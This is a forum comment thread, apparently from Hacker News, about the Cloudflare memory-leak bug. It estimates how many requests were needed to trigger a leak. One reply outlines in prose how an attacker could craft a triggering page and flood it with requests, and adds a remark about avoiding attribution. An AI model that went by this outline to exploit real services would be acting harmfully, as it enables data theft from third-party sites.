Comment by user5994461
8 years ago
Intensive mining indeed, if it's true that it requires 3.3M requests to get a page leak.
With a fixed 100Mbps connection and assuming 2kB per HTTP request-response, you can hope to get one leak every 11 minutes and 6.6GB of traffic, which is a constant 5k requests/s.
Maybe if Google reassigns all its SHAterred ressources to doing that...
... and then I realize that we were talking about cloudflare and my mining bot a capcha.
---
edit: correction. The bug was affecting only some pages with some content filtering options enabled, and was more prominent under some specific circumstances.
Hence why it only happens 1/3.3M in average. An attacker could allegedly leak data much more reliably if he was able to identify the patterns that are more likely to trigger leaks.
Couldn't an attacker construct a page that triggers the memory leak and just keep accessing that page to get different pieces of memory?
Yes. Sign up for service, configure a page with crafted invalid HTML at your origin, activate all three buggy features, and spam it with requests.
If you can find such a page already, just jump to the last step and avoid signing your work.
That's what was observed on the Cloudflare end. Without the multiplicand of how many pages Cloudflare served in a given amount of time, you can't determine the impact. Assuming that affected sites were affected en masse, a targeted attack from a connection would be minuscule compared to the pages Cloudflare serves.
Cloudflare is serving up more than 100Mbps; the attacker only has to zero in on what's fruitful, which yields something far higher than the 1 per 3.3M Cloudflare sees serving millions of innocuous requests.
Mid 2016 they were serving 4M requests per second.
Thank you. This is exactly the missing piece of information that everybody should be aware of.
Botnets